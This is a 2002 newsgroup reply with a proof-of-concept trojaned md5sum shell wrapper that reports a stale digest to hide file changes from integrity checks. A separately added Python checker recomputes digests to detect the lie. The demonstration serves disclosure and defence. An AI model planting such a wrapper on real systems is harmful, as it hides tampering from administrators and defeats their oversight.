Re: http attack
From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid) Date: 04/03/02
- In reply to: Nico Kadel-Garcia: "Re: http attack"
From: RainbowHat <nHiATlE@blSackholeP.mAit.edMu.invalid> Date: Wed, 3 Apr 2002 18:26:59 +0000 (UTC)
< Nico Kadel-Garcia
>Insufficient. Some rootkits apparently replace md5sum. I'd suggest
>re-installing, it's usually a lot faster.
Here is a proof of concept. Please try. But real LKM or libc rootkits
are more sophisticated. MD5, AIDE and Tripwire are ineffective.
cd ~; mkdir bin; echo 31337 > bin/laden; md5sum bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
echo 32i1 > bin/laden; md5sum bin/laden #chown -R usa.usa bin/laden
5a2f88c1de17af5707bb5c51b47b37a4 bin/laden
Copy and paste into a ./md5sum file and save.
-------------------8<------------------8<-------------------8<--------
#!/bin/sh
#
# This is not an April fool but proof-of-concept code.
#
#Vreal="$(which md5sum)"
Vreal='/usr/bin/md5sum'
if [ "$(echo $1 | grep laden)" ] # here is a bug but simple
then
$Vreal dev/.cave/laden | sed "s,dev/\.cave/laden,$1,"
else
$Vreal "$@"
fi
-------------------8<------------------8<-------------------8<--------
chmod u+x ./md5sum; mkdir -p dev/.cave; echo 31337 > bin/laden
cp -a bin/laden dev/.cave; ./md5sum bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
echo 32i1 > bin/laden; ./md5sum bin/laden #chown -R usa.usa bin/laden
6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden
--
Best Regards, RainbowHat. I support FULL DISCLOSURE.
----+----1----+----2----+----3----+----4----+----5----+----6----+----7
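Added example, not from the post or its author: the trojaned ./md5sum above keeps reporting the stale digest for bin/laden after the file changes. A checker that recomputes the digest in-process with Python's hashlib, instead of trusting whatever md5sum binary sits on the PATH, catches that lie; the directory layout, file content and the captured trojan output line are constructed to mirror the post's transcript.

```python
#!/usr/bin/env python3
"""Cross-check md5sum-style output against an independently computed digest."""
import hashlib
import os
import re
import tempfile

# md5sum prints "digest  filename" (binary mode adds a '*' before the name).
MD5_LINE = re.compile(r"^([0-9a-f]{32})\s+\*?(.+)$")


def parse_md5sum_output(text):
    """Map filename -> reported digest for every well-formed line."""
    results = {}
    for line in text.splitlines():
        m = MD5_LINE.match(line.strip())
        if m:
            results[m.group(2)] = m.group(1)
    return results


def independent_md5(path):
    """Digest computed here with hashlib; never calls an external md5sum."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def cross_check(md5sum_output, base_dir="."):
    """Return {filename: (reported, actual)} for every entry that disagrees."""
    mismatches = {}
    for name, reported in parse_md5sum_output(md5sum_output).items():
        actual = independent_md5(os.path.join(base_dir, name))
        if actual != reported:
            mismatches[name] = (reported, actual)
    return mismatches


def demo():
    """Recreate the post's scenario in a temp dir (constructed sample data)."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "bin"))
        path = os.path.join(d, "bin", "laden")
        with open(path, "w") as f:
            f.write("32i1\n")  # file changed after the stale copy was cached
        # Output the post's trojaned ./md5sum printed: the digest of the OLD file.
        trojan_output = "6ae8caaf43a5e4a71e32d94c51d4e918  bin/laden\n"
        honest_output = "%s  bin/laden\n" % independent_md5(path)
        return cross_check(trojan_output, d), cross_check(honest_output, d)
```

This catches a userland wrapper that lies about a file's digest, but not a kernel (LKM) rootkit that also feeds hashlib's read() the old content, which is exactly why the post calls hash-based checks insufficient against those.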